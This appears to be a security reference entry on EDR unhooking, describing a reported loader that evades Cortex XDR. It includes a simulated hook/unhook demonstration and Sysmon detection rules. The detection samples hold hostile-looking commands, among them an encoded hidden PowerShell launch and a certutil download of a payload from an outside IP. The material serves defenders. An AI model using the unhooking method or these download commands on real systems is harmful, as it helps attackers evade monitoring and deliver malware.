Bypass Record
EDR Unhooking × Palo Alto Networks Cortex XDR
A publicly-reported instance of EDR Unhooking bypassing Palo Alto Networks Cortex XDR, recorded with its original source. Factual record; no assessment of any specific deployment.
Mechanism
ShellcodePack Pro is a shellcode loader reported to execute payloads without being detected by CrowdStrike or Cortex XDR. The cited source does not document the exact mechanism; the claimed capability is consistent with direct or indirect syscalls, unhooking of the user-mode API hooks that EDR agents place in ntdll.dll, or similar evasion. Unhooking works because a user-mode agent inspects calls by overwriting the first bytes of selected functions with a jump into its own code; a loader that restores the original bytes from a clean copy of the module (read from disk or mapped from a fresh section) makes its subsequent calls invisible to that sensor. This defeats signature-based detection of the loader and whatever behavioral checks depend on those hooks. It does not by itself blind telemetry collected from the kernel, such as process and thread creation callbacks or image loads, nor the network traffic the payload generates.
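The following is an added illustration of the generic unhooking technique this record is filed under, not ShellcodePack Pro's own code (the cited source does not document its internals). It simulates an x64 ntdll syscall stub, an EDR-style inline hook on it, the unhooking step, and the integrity diff a defender can run. The "module" is a constructed dict of stub bytes so it runs on any OS; the export names are real ntdll exports but the syscall numbers are made up.

```python
# Added illustration of inline hooking, unhooking, and the defender's integrity
# diff. Not ShellcodePack Pro's code. The "ntdll" is a constructed dict of stub
# bytes; export names are real ntdll exports, the syscall numbers are made up.
import struct
from typing import Dict, List, Optional

def clean_stub(ssn: int) -> bytes:
    """x64 Nt* syscall stub as found in an unmodified ntdll.dll:
    mov r10, rcx ; mov eax, SSN ; test byte ptr [0x7FFE0308], 1 ; jne +3 ; syscall ; ret"""
    return (b"\x4c\x8b\xd1"
            + b"\xb8" + struct.pack("<I", ssn)
            + b"\xf6\x04\x25\x08\x03\xfe\x7f\x01"
            + b"\x75\x03"
            + b"\x0f\x05"
            + b"\xc3")

# Constructed on-disk image: export name -> prologue bytes (SSNs are illustrative).
ON_DISK: Dict[str, bytes] = {
    "NtAllocateVirtualMemory": clean_stub(0x18),
    "NtProtectVirtualMemory": clean_stub(0x50),
    "NtWriteVirtualMemory": clean_stub(0x3A),
    "NtClose": clean_stub(0x0F),
}

def install_hooks(image: Dict[str, bytes], targets: List[str],
                  rel32: int = 0x1000) -> Dict[str, bytes]:
    """EDR-style inline hook: the first 5 bytes of each target become 'jmp rel32'
    into the agent's inspection trampoline. Returns the process's in-memory view."""
    mem = dict(image)
    for name in targets:
        mem[name] = b"\xe9" + struct.pack("<i", rel32) + image[name][5:]
    return mem

def hooked_exports(in_memory: Dict[str, bytes], on_disk: Dict[str, bytes]) -> List[str]:
    """Defender's integrity diff: exports whose in-memory prologue differs from the
    on-disk copy. A leading E9 (jmp rel32) or FF 25 (jmp [rip+disp32]) is the
    classic fingerprint of an inline hook."""
    return sorted(n for n in on_disk if in_memory[n] != on_disk[n])

def unhook(in_memory: Dict[str, bytes], on_disk: Dict[str, bytes]) -> Dict[str, bytes]:
    """What an unhooking loader does: obtain a clean copy of the module (read from
    disk or mapped from a fresh section) and copy its .text over the hooked bytes.
    Afterwards the agent's user-mode callbacks never fire for this process."""
    return {n: on_disk[n] for n in in_memory}

def syscall_number(stub: bytes) -> Optional[int]:
    """Recover the SSN from a stub (imm32 of 'mov eax, SSN' at offset 4). Returns
    None when the prologue is hooked, which is why loaders that issue direct
    syscalls first unhook or read the SSN from the on-disk copy."""
    if stub[:4] != b"\x4c\x8b\xd1\xb8":
        return None
    return struct.unpack_from("<I", stub, 4)[0]

def walkthrough() -> dict:
    """Hook -> diff -> unhook -> diff again, returning what each stage observes."""
    hooked = install_hooks(ON_DISK, ["NtAllocateVirtualMemory",
                                     "NtProtectVirtualMemory",
                                     "NtWriteVirtualMemory"])
    before = hooked_exports(hooked, ON_DISK)
    restored = unhook(hooked, ON_DISK)
    after = hooked_exports(restored, ON_DISK)
    return {
        "hooked_exports": before,
        "ssn_while_hooked": syscall_number(hooked["NtAllocateVirtualMemory"]),
        "ssn_after_unhook": syscall_number(restored["NtAllocateVirtualMemory"]),
        "hooked_exports_after_unhook": after,
    }

if __name__ == "__main__":
    print(walkthrough())
```

The last stage is the practitioner's caveat: once the loader has restored the clean bytes, an integrity diff of ntdll's prologues reports nothing, so what remains detectable is the act itself (a process reading ntdll.dll from disk or mapping a second copy of it, a loaded module's .text being made writable) and everything the payload does afterwards through kernel-visible telemetry.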
Detection & mitigation
Focus on behavioral detection rather than loader signatures: alert on suspicious process lineage (for example, an Office application spawning PowerShell or another script host), on memory scraping, and on outbound C2 connections. Ensure EDR policies are set to block or quarantine rather than only alert, and tune behavioral rules so that post-exploitation actions are flagged even when the initial loader evades signature detection.
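As an added example of the process-lineage rule above, not drawn from the cited source: a small rule set run over constructed Sysmon Event ID 1 (process creation) records in JSON-lines form. Field names follow Sysmon's (Image, ParentImage, CommandLine, ProcessId); the events, paths and the encoded command are made up, and the parent/child sets are a starting point to tune, not a complete list.

```python
# Added example, not from the cited source: behavioral rules over constructed
# Sysmon Event ID 1 records. Field names follow Sysmon; the events are made up.
import json
import re
from typing import Dict, List

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# -e, -ec, -enc and -encodedcommand: the switch prefixes PowerShell accepts.
ENCODED_RE = re.compile(r"(?:^|\s)-e(?:c|nc|ncodedcommand)?(?:\s|$)")
HIDDEN_RE = re.compile(r"(?:^|\s)-w(?:indowstyle)?\s+hidden(?:\s|$)")

def basename(path: str) -> str:
    """Lower-cased file name from a Windows (or forward-slash) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def evaluate(event: Dict) -> List[str]:
    """Return the rule names a single process-creation event trips."""
    parent = basename(event.get("ParentImage", ""))
    child = basename(event.get("Image", ""))
    cmd = event.get("CommandLine", "").lower()
    hits = []
    if parent in OFFICE_PARENTS and child in SCRIPT_HOSTS:
        hits.append(f"office_spawns_script_host:{parent}->{child}")
    if child in POWERSHELL and ENCODED_RE.search(cmd):
        hits.append("powershell_encoded_command")
    if child in POWERSHELL and HIDDEN_RE.search(cmd):
        hits.append("powershell_hidden_window")
    return hits

def scan(jsonl: str) -> Dict[int, List[str]]:
    """Map ProcessId -> tripped rules for every event that tripped at least one."""
    flagged: Dict[int, List[str]] = {}
    for line in jsonl.splitlines():
        if not line.strip():
            continue
        event = json.loads(line)
        hits = evaluate(event)
        if hits:
            flagged[event["ProcessId"]] = hits
    return flagged

# Constructed sample: a benign Office launch, an Office-spawned encoded hidden
# PowerShell, a legitimate PowerShell script from Explorer, and Excel spawning cmd.
SAMPLE_EVENTS = "\n".join(json.dumps(e) for e in [
    {"ProcessId": 4120,
     "Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"WINWORD.EXE" /n invoice.docm'},
    {"ProcessId": 4388,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": "powershell.exe -NoP -W Hidden -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"ProcessId": 5012,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\Users\alice\build.ps1"},
    {"ProcessId": 5240,
     "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "CommandLine": r"cmd.exe /c certutil -urlcache -f http://203.0.113.7/p.bin p.bin"},
])

if __name__ == "__main__":
    for pid, hits in scan(SAMPLE_EVENTS).items():
        print(pid, hits)
```

Two of the four constructed events are flagged (the Office-spawned PowerShell on all three rules, the Excel-spawned cmd on lineage alone); the Explorer-launched script with -ExecutionPolicy is deliberately left unflagged to show that the encoded-command rule keys on the switch itself, not on any argument starting with -e.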
This is a record of a publicly-reported event, not an assessment of any specific organization's deployment. Detection and mitigation notes are drawn from the cited source. Where the source is silent, fields are omitted.